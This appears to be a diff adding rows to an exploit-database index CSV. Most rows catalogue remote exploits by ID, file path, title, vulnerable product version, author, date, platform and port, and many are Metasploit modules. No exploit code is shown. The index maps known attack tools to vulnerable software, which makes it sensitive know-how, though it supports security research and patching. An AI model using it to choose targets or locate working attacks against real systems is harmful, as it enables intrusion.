+35805,exploits/multiple/remote/35805.txt,"Gadu-Gadu 10.5 - Remote Code Execution",2011-05-28,"Kacper Szczesniak",remote,multiple, +35806,exploits/windows/remote/35806.c,"Poison Ivy 2.3.2 - Remote Buffer Overflow",2011-05-27,"Kevin R.V",remote,windows, +35809,exploits/windows/remote/35809.c,"Microsoft Windows Live Messenger 14 - 'dwmapi.dll' DLL Loading Arbitrary Code Execution",2011-05-31,Kalashinkov3,remote,windows, +35810,exploits/linux/remote/35810.txt,"libxmlInvalid 2.7.x - XPath Multiple Memory Corruption Vulnerabilities",2011-05-31,"Chris Evans",remote,linux, +35817,exploits/hardware/remote/35817.txt,"NETGEAR WNDAP350 Wireless Access Point - Multiple Information Disclosure Vulnerabilities",2011-06-01,"Juerd Waalboer",remote,hardware, +35818,exploits/multiple/remote/35818.txt,"Nagios 3.2.3 - 'expand' Cross-Site Scripting",2011-06-01,"Stefan Schurtz",remote,multiple, +35822,exploits/windows/remote/35822.html,"Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution",2015-01-19,"Praveen Darshanam",remote,windows, +35836,exploits/linux/remote/35836.pl,"Perl Data::FormValidator 4.66 Module - 'results()' Security Bypass",2011-06-08,dst,remote,linux, +35995,exploits/hardware/remote/35995.sh,"Shuttle Tech ADSL Modem/Router 915 WM - Unauthenticated Remote DNS Change",2015-02-05,"Todor Donev",remote,hardware, +35997,exploits/hardware/remote/35997.sh,"Sagem F@st 3304 Routers - PPPoE Credentials Information Disclosure",2011-07-27,securititracker,remote,hardware, +35845,exploits/java/remote/35845.rb,"ManageEngine (Multiple Products) - Authenticated Arbitrary File Upload (Metasploit)",2015-01-20,Metasploit,remote,java,8080 +35855,exploits/php/remote/35855.txt,"PHP 5.3.6 - Security Bypass",2011-06-14,"Krzysztof Kotowicz",remote,php, +35864,exploits/windows/remote/35864.txt,"Sunway ForceControl 6.1 - Multiple Heap Based Buffer Overflow Vulnerabilities",2011-06-17,"Dillon Beresford",remote,windows, +35880,exploits/windows/remote/35880.html,"LeadTools Imaging LEADSmtp - ActiveX Control 'SaveMessage()' Insecure Method",2011-06-23,"High-Tech Bridge SA",remote,windows, +35881,exploits/windows/remote/35881.c,"xAurora 10.00 - 'RSRC32.dll' DLL Loading Arbitrary Code Execution",2011-06-24,"Zer0 Thunder",remote,windows, +35885,exploits/windows/remote/35885.txt,"Ubisoft CoGSManager ActiveX Control 1.0.0.23 - 'Initialize()' Method Stack Buffer Overflow",2011-06-27,"Luigi Auriemma",remote,windows, +35886,exploits/windows/remote/35886.txt,"Sybase Advantage Server 10.0.0.3 - 'ADS' Process Off-by-One Buffer Overflow",2011-06-27,"Luigi Auriemma",remote,windows, +35887,exploits/hardware/remote/35887.txt,"Cisco Ironport Appliances - Privilege Escalation",2015-01-22,"Glafkos Charalambous",remote,hardware, +35892,exploits/multiple/remote/35892.txt,"MySQLDriverCS 4.0.1 - SQL Injection",2011-06-27,"Qihan Luo",remote,multiple, +35897,exploits/windows/remote/35897.html,"CygniCon CyViewer - ActiveX Control 'SaveData()' Insecure Method",2011-06-28,"High-Tech Bridge SA",remote,windows, +35898,exploits/multiple/remote/35898.php,"Atlassian JIRA 3.13.5 - File Download Security Bypass",2011-06-28,"Ignacio Garrido",remote,multiple, +35917,exploits/hardware/remote/35917.txt,"D-Link DSL-2740R - Unauthenticated Remote DNS Change",2015-01-27,"Todor Donev",remote,hardware, +35918,exploits/multiple/remote/35918.c,"IBM DB2 - 'DT_RPATH' Insecure Library Loading Arbitrary Code Execution",2011-06-30,"Tim Brown",remote,multiple, +35919,exploits/bsd/remote/35919.c,"NetBSD 5.1 - 'libc/net' Multiple Stack Buffer Overflows",2011-07-01,"Maksymilian Arciemowicz",remote,bsd, +35921,exploits/windows/remote/35921.html,"iMesh 10.0 - 'IMWebControl.dll' ActiveX Control Buffer Overflow",2011-07-04,KedAns-Dz,remote,windows, +35924,exploits/windows/remote/35924.py,"ClearSCADA - Remote Authentication Bypass",2015-01-28,"Jeremy Brown",remote,windows, +35925,exploits/hardware/remote/35925.txt,"Portech MV-372 VoIP Gateway - Multiple Vulnerabilities",2011-07-05,"Zsolt Imre",remote,hardware, +35928,exploits/windows/remote/35928.html,"Pro Softnet IDrive Online Backup 3.4.0 - ActiveX 'SaveToFile()' Arbitrary File Overwrite",2011-07-06,"High-Tech Bridge SA",remote,windows, +35932,exploits/hardware/remote/35932.c,"VSAT Sailor 900 - Remote Overflow",2015-01-29,"Nicholas Lemonias",remote,hardware, +35948,exploits/windows/remote/35948.html,"X360 VideoPlayer ActiveX Control 2.6 - ASLR + DEP Bypass",2015-01-30,Rh0,remote,windows, +35949,exploits/windows/remote/35949.txt,"Symantec Encryption Management Server < 3.2.0 MP6 - Remote Command Injection",2015-01-30,"Paul Craig",remote,windows, +35961,exploits/hp-ux/remote/35961.py,"HP Data Protector 8.x - Remote Command Execution",2015-01-30,"Juttikhun Khamchaiyaphum",remote,hp-ux, +35970,exploits/hardware/remote/35970.txt,"Iskratel SI2000 Callisto 821+ - Cross-Site Request Forgery / HTML Injection",2011-07-18,MustLive,remote,hardware, +36004,exploits/multiple/remote/36004.txt,"Skype 5.3 - 'Mobile Phone' HTML Injection",2011-08-01,noptrix,remote,multiple, +36006,exploits/multiple/remote/36006.java,"Open Handset Alliance Android 2.3.4/3.1 - Browser Sandbox Security Bypass",2011-08-02,"Roee Hay",remote,multiple, +36013,exploits/multiple/remote/36013.txt,"foomatic-gui python-foomatic 0.7.9.4 - 'pysmb.py' Arbitrary Shell Command Execution",2011-08-03,daveb,remote,multiple, +36014,exploits/hardware/remote/36014.pl,"LG DVR LE6016D - Unauthenticated Remote Users/Passwords Disclosure",2015-02-07,"Todor Donev",remote,hardware, +36016,exploits/multiple/remote/36016.txt,"Xpdf 3.02-13 - 'zxpdf' Security Bypass",2011-08-04,"Chung-chieh Shan",remote,multiple, +36020,exploits/windows/remote/36020.txt,"Microsoft Visual Studio Report Viewer 2005 Control - Multiple Cross-Site Scripting Vulnerabilities",2011-08-09,"Adam Bixby",remote,windows, +36045,exploits/cgi/remote/36045.txt,"SurgeFTP 23b6 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-16,"Houssam Sahli",remote,cgi, +36049,exploits/windows/remote/36049.html,"StudioLine Photo Basic 3.70.34.0 - 'NMSDVDXU.dll' ActiveX Control Arbitrary File Overwrite",2011-08-17,"High-Tech Bridge SA",remote,windows, +36056,exploits/windows/remote/36056.rb,"Achat 0.150 beta7 - Remote Buffer Overflow (Metasploit)",2015-02-11,Metasploit,remote,windows,9256 +36075,exploits/windows/remote/36075.py,"Freefloat FTP Server - 'ALLO' Remote Buffer Overflow",2011-08-20,Black.Spook,remote,windows, +36078,exploits/windows/remote/36078.py,"PCMan FTP Server 2.0.7 - 'MKD' Remote Buffer Overflow",2015-02-14,R-73eN,remote,windows, +36100,exploits/windows/remote/36100.rb,"X360 VideoPlayer - ActiveX Control Buffer Overflow (Metasploit)",2015-02-17,Metasploit,remote,windows, +36101,exploits/java/remote/36101.rb,"Java JMX - Server Insecure Configuration Java Code Execution (Metasploit)",2015-02-17,Metasploit,remote,java,1617 +36111,exploits/windows/remote/36111.py,"Cerberus FTP Server 4.0.9.8 - Remote Buffer Overflow",2011-09-05,KedAns-Dz,remote,windows, +36115,exploits/windows/remote/36115.txt,"Apple QuickTime 7.6.9 - 'QuickTimePlayer.dll' ActiveX Buffer Overflow",2011-09-06,"Ivan Sanchez",remote,windows, +36124,exploits/php/remote/36124.txt,"jQuery - jui_filter_rules PHP Code Execution",2015-02-19,"Timo Schmid",remote,php,80 +36130,exploits/multiple/remote/36130.txt,"Spring Security - HTTP Header Injection",2011-09-09,"David Mas",remote,multiple, +36145,exploits/windows/remote/36145.py,"IBM Lotus Domino 8.5.2 - 'NSFComputeEvaluateExt()' Remote Stack Buffer Overflow",2011-09-20,rmallof,remote,windows, +36169,exploits/multiple/remote/36169.rb,"HP Client - Automation Command Injection (Metasploit)",2015-02-24,Metasploit,remote,multiple,3465 +36174,exploits/windows/remote/36174.txt,"ServersCheck Monitoring Software 8.8.x - Multiple Vulnerabilities",2011-09-27,Vulnerability-Lab,remote,windows, +36199,exploits/linux/remote/36199.txt,"Perl 5.x - Digest Module 'Digest->new()' Code Injection",2011-10-02,anonymous,remote,linux, +36205,exploits/hardware/remote/36205.txt,"SonicWALL - SessId Cookie Brute Force Weakness Admin Session Hijacking",2011-10-04,"Hugo Vazquez",remote,hardware, +36206,exploits/windows/remote/36206.rb,"Persistent Systems Client Automation - Command Injection Remote Code Execution (Metasploit)",2015-02-27,"Ben Turner",remote,windows,3465 +36209,exploits/windows/remote/36209.html,"Microsoft Internet Explorer 8 - Select Element Memory Corruption",2011-10-11,"Ivan Fratric",remote,windows, +36263,exploits/linux/remote/36263.rb,"Symantec Web Gateway 5 - 'restore.php' Authenticated Command Injection (Metasploit)",2015-03-04,Metasploit,remote,linux,443 +36217,exploits/windows/remote/36217.txt,"GoAhead Web Server 2.18 - 'addgroup.asp?group' Cross-Site Scripting",2011-10-10,"Silent Dream",remote,windows, +36218,exploits/windows/remote/36218.txt,"GoAhead Web Server 2.18 - 'addlimit.asp?url' Cross-Site Scripting",2011-10-10,"Silent Dream",remote,windows, +36219,exploits/windows/remote/36219.txt,"GoAhead Web Server 2.18 - 'adduser.asp' Multiple Cross-Site Scripting Vulnerabilities",2011-10-10,"Silent Dream",remote,windows, +36235,exploits/windows/remote/36235.txt,"PROMOTIC 8.1.3 - Multiple Vulnerabilities",2011-10-14,"Luigi Auriemma",remote,windows, +36238,exploits/multiple/remote/36238.txt,"Toshiba e-Studio (Multiple Devices) - Security Bypass",2011-10-17,"Deral Heiland PercX",remote,multiple, +36239,exploits/hardware/remote/36239.txt,"Check Point UTM-1 Edge and Safe 8.2.43 - Multiple Vulnerabilities",2011-10-18,"Richard Brain",remote,hardware, +36246,exploits/multiple/remote/36246.txt,"Splunk 4.1.6 - 'segment' Cross-Site Scripting",2011-10-20,"Filip Palian",remote,multiple, +36250,exploits/windows/remote/36250.html,"Oracle AutoVue 20.0.1 - 'AutoVueX.ocx' ActiveX Control 'ExportEdaBom()' Insecure Method",2011-10-24,rgod,remote,windows, +36256,exploits/hardware/remote/36256.txt,"Cisco - 'file' Directory Traversal",2011-10-26,"Sandro Gauci",remote,hardware, +36258,exploits/windows/remote/36258.txt,"XAMPP 1.7.4 - Cross-Site Scripting",2011-10-26,Sangteamtham,remote,windows, +36264,exploits/php/remote/36264.rb,"Seagate Business NAS - Unauthenticated Remote Command Execution (Metasploit)",2015-03-04,Metasploit,remote,php,80 +36291,exploits/windows/remote/36291.txt,"XAMPP 1.7.7 - 'PHP_SELF' Multiple Cross-Site Scripting Vulnerabilities",2011-11-07,"Gjoko Krstic",remote,windows, +36304,exploits/windows/remote/36304.rb,"HP Data Protector 8.10 - Remote Command Execution (Metasploit)",2015-03-06,Metasploit,remote,windows,5555 +36318,exploits/windows/remote/36318.txt,"Jetty Web Server - Directory Traversal",2011-11-18,"Alexey Sintsov",remote,windows, +36319,exploits/windows/remote/36319.txt,"GoAhead Web Server 2.5 - 'goform/formTest' Multiple Cross-Site Scripting Vulnerabilities",2011-11-18,"Prabhu S Angadi",remote,windows, +36337,exploits/linux/remote/36337.py,"ElasticSearch - Unauthenticated Remote Code Execution",2015-03-11,"Xiphos Research Ltd",remote,linux,9200 +36352,exploits/linux/remote/36352.txt,"Apache 7.0.x mod_proxy - Reverse Proxy Security Bypass",2011-11-24,"Prutha Parikh",remote,linux, +36360,exploits/windows/remote/36360.rb,"Adobe Flash Player - ByteArray UncompressViaZlibVariant Use-After-Free (Metasploit)",2015-03-12,Metasploit,remote,windows, +36370,exploits/linux/remote/36370.txt,"ArcSight Logger - Arbitrary File Upload / Code Execution",2015-03-13,"Horoszkiewicz Julian ISP_",remote,linux, +36376,exploits/windows/remote/36376.txt,"Oxide WebServer - Directory Traversal",2011-11-29,demonalex,remote,windows, +36412,exploits/windows/remote/36412.rb,"IPass Control Pipe - Remote Command Execution (Metasploit)",2015-03-16,Metasploit,remote,windows, +36415,exploits/java/remote/36415.rb,"ElasticSearch - Search Groovy Sandbox Bypass (Metasploit)",2015-03-16,Metasploit,remote,java,9200 +36420,exploits/windows/remote/36420.rb,"Adobe Flash Player - PCRE Regex (Metasploit)",2015-03-17,Metasploit,remote,windows, +36421,exploits/linux/remote/36421.rb,"Exim GHOST - glibc gethostbyname Buffer Overflow (Metasploit)",2015-03-18,"Qualys Corporation",remote,linux,25 +36480,exploits/multiple/remote/36480.rb,"Mozilla Firefox - Proxy Prototype Privileged JavaScript Injection (Metasploit)",2015-03-24,Metasploit,remote,multiple, +36426,exploits/multiple/remote/36426.txt,"Apache Struts 2.0.9/2.1.8 - Session Tampering Security Bypass",2011-12-07,"Hisato Killing",remote,multiple, +36428,exploits/hardware/remote/36428.txt,"Axis M10 Series Network Cameras - Cross-Site Scripting",2011-12-07,"Matt Metzger",remote,hardware, +36429,exploits/hardware/remote/36429.txt,"HomeSeer HS2 2.5.0.20 - Web Interface Log Viewer Page URI Cross-Site Scripting",2011-12-08,"Silent Dream",remote,hardware, +36438,exploits/php/remote/36438.rb,"TWiki Debugenableplugins - Remote Code Execution (Metasploit)",2015-03-19,Metasploit,remote,php,80 +36455,exploits/multiple/remote/36455.txt,"Nagios XI - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2011-12-14,anonymous,remote,multiple, +36475,exploits/hardware/remote/36475.txt,"Barracuda Control Center 620 - Cross-Site Scripting / HTML Injection",2011-12-21,Vulnerability-Lab,remote,hardware, +36477,exploits/windows/remote/36477.py,"Bsplayer 2.68 - HTTP Response Universal",2015-03-24,"Fady Mohammed Osman",remote,windows, +36491,exploits/windows/remote/36491.txt,"Adobe Flash Player - Arbitrary Code Execution",2015-03-25,SecurityObscurity,remote,windows, +36500,exploits/windows/remote/36500.txt,"HServer 0.1.1 - Directory Traversal",2012-01-05,demonalex,remote,windows, +36503,exploits/hardware/remote/36503.rb,"QNAP - Admin Shell via Bash Environment Variable Code Injection (Metasploit)",2015-03-26,"Patrick Pellegrino",remote,hardware,9993 +36504,exploits/hardware/remote/36504.rb,"QNAP - Web Server Remote Code Execution via Bash Environment Variable Code Injection (Metasploit)",2015-03-26,"Patrick Pellegrino",remote,hardware, +36505,exploits/windows/remote/36505.txt,"WebGate eDVR Manager - Remote Stack Buffer Overflow",2015-03-26,"Praveen Darshanam",remote,windows, +36507,exploits/windows/remote/36507.txt,"Microsoft AntiXSS 3/4.0 Library Sanitization Module - Security Bypass",2012-01-10,"Adi Cohen",remote,windows, +36511,exploits/hardware/remote/36511.txt,"Astaro Security Gateway 8.1 - HTML Injection",2012-12-27,"Vulnerability Research Laboratory",remote,hardware, +36513,exploits/windows/remote/36513.txt,"IpTools 0.1.4 - Tiny TCP/IP servers Directory Traversal",2012-01-06,demonalex,remote,windows, +36514,exploits/windows/remote/36514.pl,"IPtools 0.1.4 - Remote Command Server Buffer Overflow",2012-01-06,demonalex,remote,windows, +36516,exploits/windows/remote/36516.py,"Acunetix 9.5 - OLE Automation Array Remote Code Execution",2015-03-27,"Naser Farhadi",remote,windows, +36517,exploits/windows/remote/36517.html,"WebGate WinRDS 2.0.8 - StopSiteAllChannel Stack Overflow",2015-03-27,"Praveen Darshanam",remote,windows, +36518,exploits/windows/remote/36518.html,"WebGate Control Center 4.8.7 - GetThumbnail Stack Overflow",2015-03-27,"Praveen Darshanam",remote,windows, +36519,exploits/windows/remote/36519.html,"WebGate eDVR Manager 2.6.4 - SiteName Stack Overflow",2015-03-27,"Praveen Darshanam",remote,windows, +36537,exploits/multiple/remote/36537.txt,"SonicWALL AntiSpam & EMail 7.3.1 - Multiple Vulnerabilities",2012-01-10,"Benjamin Kunz Mejri",remote,multiple, +36542,exploits/windows/remote/36542.txt,"ExpressView Browser Plugin 6.5.0.3330 - Multiple Integer Overflow / Remote Code Execution Vulnerabilities",2012-01-11,"Luigi Auriemma",remote,windows, +36546,exploits/windows/remote/36546.txt,"GreenBrowser 6.0.1002 - Search Bar Short Cut Button Double-Free Remote Memory Corruption",2012-01-12,NCNIPC,remote,windows, +36562,exploits/linux/remote/36562.txt,"Apache Spark Cluster 1.3.x - Arbitrary Code Execution",2015-03-30,"Akhil Das",remote,linux, +36577,exploits/multiple/remote/36577.py,"Airties Air5650TT - Remote Stack Overflow",2015-03-31,"Batuhan Burakcin",remote,multiple, +36579,exploits/windows/remote/36579.rb,"Adobe Flash Player - ByteArray With Workers Use-After-Free (Metasploit)",2015-03-31,Metasploit,remote,windows, +36587,exploits/windows/remote/36587.py,"Savant Web Server 3.1 - Remote Buffer Overflow (4)",2012-01-21,red-dragon,remote,windows, +36602,exploits/windows/remote/36602.html,"WebGate WESP SDK 1.2 - ChangePassword Stack Overflow",2015-04-02,"Praveen Darshanam",remote,windows, +36603,exploits/windows/remote/36603.html,"WebGate eDVR Manager 2.6.4 - AudioOnlySiteChannel Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",remote,windows, +36604,exploits/windows/remote/36604.html,"WebGate WinRDS 2.0.8 - PlaySiteAllChannel Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",remote,windows, +36606,exploits/windows/remote/36606.html,"WebGate eDVR Manager 2.6.4 - SiteChannel Property Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",remote,windows, +36607,exploits/windows/remote/36607.html,"WebGate eDVR Manager 2.6.4 - Connect Method Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",remote,windows, +36652,exploits/multiple/remote/36652.py,"w3tw0rk / Pitbull Perl IRC Bot - Remote Code Execution (PoC)",2015-04-06,"Jay Turla",remote,multiple,6667 +36653,exploits/jsp/remote/36653.rb,"JBoss Seam 2 - Arbitrary File Upload / Execution (Metasploit)",2015-04-06,Metasploit,remote,jsp,8080 +36663,exploits/linux/remote/36663.txt,"Apache 2.2.15 mod_proxy - Reverse Proxy Security Bypass",2012-02-06,"Tomas Hoger",remote,linux, +36670,exploits/hardware/remote/36670.txt,"D-Link ShareCenter Products - Multiple Remote Code Execution Vulnerabilities",2012-02-08,"Roberto Paleari",remote,hardware, +36679,exploits/windows/remote/36679.rb,"SolarWinds Firewall Security Manager 6.6.5 - Client Session Handling (Metasploit)",2015-04-08,Metasploit,remote,windows, +36680,exploits/hardware/remote/36680.txt,"Trendnet Camera (Multiple Products) - Remote Security Bypass",2012-02-10,console-cowboys,remote,hardware, +36681,exploits/multiple/remote/36681.txt,"Apache MyFaces - 'ln' Information Disclosure",2012-02-09,"Paul Nicolucci",remote,multiple, +36690,exploits/linux/remote/36690.rb,"Barracuda Firmware 5.0.0.012 - Authenticated Remote Command Execution (Metasploit)",2015-04-09,xort,remote,linux,8000 +36742,exploits/linux/remote/36742.txt,"ProFTPd 1.3.5 - File Copy",2015-04-13,anonymous,remote,linux, +36744,exploits/windows/remote/36744.rb,"Adobe Flash Player - casi32 Integer Overflow (Metasploit)",2015-04-13,Metasploit,remote,windows, +36756,exploits/windows/remote/36756.html,"Samsung iPOLiS - ReadConfigValue Remote Code Execution",2015-04-14,"Praveen Darshanam",remote,windows, +36767,exploits/hardware/remote/36767.html,"D-Link DAP-1150 1.2.94 - Cross-Site Request Forgery",2012-02-13,MustLive,remote,hardware, +36803,exploits/linux/remote/36803.py,"ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution",2015-04-21,R-73eN,remote,linux, +36808,exploits/windows/remote/36808.rb,"Adobe Flash Player - copyPixelsToByteArray Integer Overflow (Metasploit)",2015-04-21,Metasploit,remote,windows, +36809,exploits/php/remote/36809.rb,"WordPress Plugin Reflex Gallery - Arbitrary File Upload (Metasploit)",2015-04-21,Metasploit,remote,php,80 +36810,exploits/php/remote/36810.rb,"WordPress Plugin N-Media Website Contact Form - Arbitrary File Upload (Metasploit)",2015-04-21,Metasploit,remote,php,80 +36811,exploits/php/remote/36811.rb,"WordPress Plugin Creative Contact Form - Arbitrary File Upload (Metasploit)",2015-04-21,Metasploit,remote,php,80 +36812,exploits/php/remote/36812.rb,"WordPress Plugin Work The Flow - Arbitrary File Upload (Metasploit)",2015-04-21,Metasploit,remote,php,80 +36829,exploits/windows/remote/36829.txt,"R2/Extreme 1.65 - Stack Based Buffer Overflow / Directory Traversal",2012-02-17,"Luigi Auriemma",remote,windows, +36831,exploits/hardware/remote/36831.txt,"Endian Firewall 2.4 - 'openvpn_users.cgi?PATH_INFO' Cross-Site Scripting",2012-02-27,"Vulnerability Research Laboratory",remote,hardware, +36832,exploits/hardware/remote/36832.txt,"Endian Firewall 2.4 - 'dnat.cgi?createrule' Cross-Site Scripting",2012-02-27,"Vulnerability Research Laboratory",remote,hardware, +36833,exploits/hardware/remote/36833.txt,"Endian Firewall 2.4 - 'dansguardian.cgi?addrule' Cross-Site Scripting",2012-02-27,"Vulnerability Research Laboratory",remote,hardware, +36836,exploits/multiple/remote/36836.py,"Legend Perl IRC Bot - Remote Code Execution (PoC)",2015-04-27,"Jay Turla",remote,multiple, +36839,exploits/multiple/remote/36839.py,"MiniUPnPd 1.0 (MIPS) - Remote Stack Overflow Remote Code Execution for AirTies RT Series",2015-04-27,"Onur Alanbel (BGA)",remote,multiple, +36995,exploits/hardware/remote/36995.txt,"F5 FirePass 7.0 - SQL Injection",2012-03-14,anonymous,remote,hardware, +37169,exploits/linux/remote/37169.rb,"Realtek SDK - Miniigd UPnP SOAP Command Execution (Metasploit)",2015-06-01,Metasploit,remote,linux,52869 +36864,exploits/hardware/remote/36864.txt,"Xavi 7968 ADSL Router - Multiple Cross-Site Request Forgery Vulnerabilities",2012-02-21,Busindre,remote,hardware, +36866,exploits/hardware/remote/36866.txt,"Xavi 7968 ADSL Router - '/webconfig/wan/confirm.html/confirm?pvcName' Cross-Site Scripting",2012-02-21,Busindre,remote,hardware, +36877,exploits/hardware/remote/36877.html,"D-Link DCS - 'security.cgi' Cross-Site Request Forgery",2012-02-23,"Rigan Iimrigan",remote,hardware, +36880,exploits/windows/remote/36880.rb,"Adobe Flash Player - UncompressViaZlibVariant Uninitialized Memory (Metasploit)",2015-05-01,Metasploit,remote,windows, +36884,exploits/linux/remote/36884.py,"libpurple 2.8.10 - OTR Information Disclosure",2012-02-25,"Dimitris Glynos",remote,linux, +36915,exploits/windows/remote/36915.txt,"NetDecision 4.6.1 - Multiple Directory Traversal Vulnerabilities",2012-03-07,"Luigi Auriemma",remote,windows, +36931,exploits/hardware/remote/36931.txt,"Barracuda CudaTel Communication Server 2.0.029.1 - Multiple HTML Injection Vulnerabilities",2012-03-08,"Benjamin Kunz Mejri",remote,hardware, +36932,exploits/windows/remote/36932.py,"RealVNC 4.1.0/4.1.1 - Authentication Bypass",2012-05-13,fdiskyou,remote,windows,5900 +36933,exploits/linux/remote/36933.py,"dhclient 4.1 - Bash Environment Variable Command Injection (PoC) (Shellshock)",2014-09-29,fdiskyou,remote,linux, +36945,exploits/hardware/remote/36945.txt,"TP-Link TL-WR740N 111130 - 'ping_addr' HTML Injection",2012-03-12,l20ot,remote,hardware, +36955,exploits/osx/remote/36955.py,"MacKeeper - URL Handler Remote Code Execution",2015-05-08,"Braden Thomas",remote,osx, +36956,exploits/windows/remote/36956.rb,"Adobe Flash Player - domainMemory ByteArray Use-After-Free (Metasploit)",2015-05-08,Metasploit,remote,windows, +36957,exploits/php/remote/36957.rb,"WordPress Plugin RevSlider 3.0.95 - Arbitrary File Upload / Execution (Metasploit)",2015-05-08,Metasploit,remote,php,80 +36962,exploits/windows/remote/36962.rb,"Adobe Flash Player - NetConnection Type Confusion (Metasploit)",2015-05-08,Metasploit,remote,windows, +36964,exploits/java/remote/36964.rb,"Novell ZENworks Configuration Management - Arbitrary File Upload (Metasploit)",2015-05-08,Metasploit,remote,java,443 +36984,exploits/windows/remote/36984.py,"i.FTP 2.21 - Time Field (SEH)",2015-05-11,"Revin Hadi Saputra",remote,windows, +36996,exploits/unix/remote/36996.rb,"SixApart MovableType - Storable Perl Code Execution (Metasploit)",2015-05-12,Metasploit,remote,unix,80 +37007,exploits/linux/remote/37007.txt,"AtMail 1.04 - Multiple Vulnerabilities",2012-03-22,"Yury Maryshev",remote,linux, +37020,exploits/windows/remote/37020.html,"Apple Safari 5.1.5 For Windows - 'window.open()' URI Spoofing",2012-03-28,Lostmon,remote,windows, +37037,exploits/hardware/remote/37037.txt,"Arbor Networks Peakflow SP 3.6.1 - 'index/' Cross-Site Scripting",2012-04-03,b.saleh,remote,hardware, +37066,exploits/hardware/remote/37066.py,"Phoenix Contact ILC 150 ETH PLC - Remote Control Script",2015-05-20,Photubias,remote,hardware, +37081,exploits/multiple/remote/37081.py,"McAfee Web Gateway 7.1.5.x - 'Host' HTTP Header Security Bypass",2012-04-16,"Gabriel Menezes Nunes",remote,multiple, +37097,exploits/ios/remote/37097.py,"FTP Media Server 3.0 - Authentication Bypass / Denial of Service",2015-05-25,"Wh1t3Rh1n0 (Michael Allen)",remote,ios, +37141,exploits/hardware/remote/37141.txt,"Linksys WRT54GL Wireless Router - Cross-Site Request Forgery",2012-05-08,Kalashinkov3,remote,hardware, +37170,exploits/hardware/remote/37170.rb,"Airties - login-cgi Buffer Overflow (Metasploit)",2015-06-01,Metasploit,remote,hardware, +37163,exploits/windows/remote/37163.py,"IBM Security AppScan Standard 9.0.2 - OLE Automation Array Remote Code Execution",2015-06-01,"Naser Farhadi",remote,windows, +37165,exploits/windows/remote/37165.py,"WebDrive 12.2 (Build #4172) - Remote Buffer Overflow (PoC)",2015-06-01,metacom,remote,windows, +37171,exploits/hardware/remote/37171.rb,"D-Link Devices - HNAP SOAPAction-Header Command Execution (Metasploit)",2015-06-01,Metasploit,remote,hardware, +37184,exploits/hardware/remote/37184.py,"Seagate Central 2014.0410.0026-F - Remote Command Execution",2015-06-03,"Jeremy Brown",remote,hardware, +37198,exploits/multiple/remote/37198.rb,"JDownloader 2 Beta - Directory Traversal",2015-06-04,PizzaHatHacker,remote,multiple, +37262,exploits/linux/remote/37262.rb,"ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)",2015-06-10,Metasploit,remote,linux, +37336,exploits/multiple/remote/37336.txt,"CUPS < 2.0.3 - Multiple Vulnerabilities",2015-06-22,"Google Security Research",remote,multiple, +37368,exploits/multiple/remote/37368.rb,"Adobe Flash Player - ShaderJob Buffer Overflow (Metasploit)",2015-06-24,Metasploit,remote,multiple, +37396,exploits/windows/remote/37396.txt,"XAMPP for Windows 1.7.7 - Multiple Cross-Site Scripting / SQL Injections",2012-06-13,Sangteamtham,remote,windows, +37400,exploits/windows/remote/37400.php,"Havij - OLE Automation Array Remote Code Execution",2015-06-27,"Mohammad Reza Espargham",remote,windows, +37429,exploits/hardware/remote/37429.txt,"Juniper Networks Mobility System Software - '/aaa/wba_login.html' Cross-Site Scripting",2012-06-14,"Craig Lambert",remote,hardware, +37405,exploits/hardware/remote/37405.py,"Edimax IC-3030iWn - UDP Packet Password Information Disclosure",2012-06-14,y3dips,remote,hardware, +37426,exploits/cgi/remote/37426.py,"Endian Firewall < 3.0.0 - OS Command Injection (Python) (PoC)",2015-06-29,"Ben Lincoln",remote,cgi, +37428,exploits/cgi/remote/37428.txt,"Endian Firewall < 3.0.0 - OS Command Injection (Metasploit)",2015-06-29,"Ben Lincoln",remote,cgi, +37564,exploits/hardware/remote/37564.txt,"Barracuda Email Security Service - Multiple HTML Injection Vulnerabilities",2012-08-02,"Benjamin Kunz Mejri",remote,hardware, +37448,exploits/multiple/remote/37448.rb,"Adobe Flash Player - Drawing Fill Shader Memory Corruption (Metasploit)",2015-06-30,Metasploit,remote,multiple, +37510,exploits/windows/remote/37510.c,"Google Chrome 19.0.1084.52 - 'metro_driver.dll' DLL Loading Arbitrary Code Execution",2012-06-26,"Moshe Zioni",remote,windows, +37512,exploits/hardware/remote/37512.txt,"Barracuda SSL VPN - 'launchAgent.do?return-To' Cross-Site Scripting",2012-07-18,"Benjamin Kunz Mejri",remote,hardware, +37513,exploits/hardware/remote/37513.txt,"Barracuda SSL VPN - 'fileSystem.do' Multiple Cross-Site Scripting Vulnerabilities",2012-07-18,"Benjamin Kunz Mejri",remote,hardware, +37523,exploits/multiple/remote/37523.rb,"Adobe Flash Player - ByteArray Use-After-Free (Metasploit)",2015-07-08,Metasploit,remote,multiple, +37536,exploits/multiple/remote/37536.rb,"Adobe Flash Player - Nellymoser Audio Decoding Buffer Overflow (Metasploit)",2015-07-08,Metasploit,remote,multiple, +37542,exploits/windows/remote/37542.html,"Barcodewiz 'Barcodewiz.dll' ActiveX Control - 'Barcode' Method Remote Buffer Overflow",2012-07-25,coolkaveh,remote,windows, +37576,exploits/linux/remote/37576.cpp,"Alligra Calligra - Heap Based Buffer Overflow",2012-08-07,"Charlie Miller",remote,linux, +37597,exploits/hardware/remote/37597.rb,"Accellion FTA - getStatus verify_oauth_token Command Execution (Metasploit)",2015-07-13,Metasploit,remote,hardware,443 +37598,exploits/multiple/remote/37598.rb,"VNC Keyboard - Remote Code Execution (Metasploit)",2015-07-13,Metasploit,remote,multiple,5900 +37599,exploits/windows/remote/37599.rb,"Adobe Flash - opaqueBackground Use-After-Free (Metasploit)",2015-07-13,Metasploit,remote,windows, +37600,exploits/multiple/remote/37600.rb,"Western Digital Arkeia < 11.0.12 - Remote Code Execution (Metasploit)",2015-07-13,Metasploit,remote,multiple,617 +37611,exploits/windows/remote/37611.php,"Impero Education Pro - System Remote Command Execution",2015-07-14,slipstream,remote,windows, +37628,exploits/hardware/remote/37628.rb,"D-Link Devices - Cookie Command Execution (Metasploit)",2015-07-17,Metasploit,remote,hardware, +37647,exploits/multiple/remote/37647.txt,"Apache Struts 2 - Skill Name Remote Code Execution",2012-08-23,kxlzx,remote,multiple, 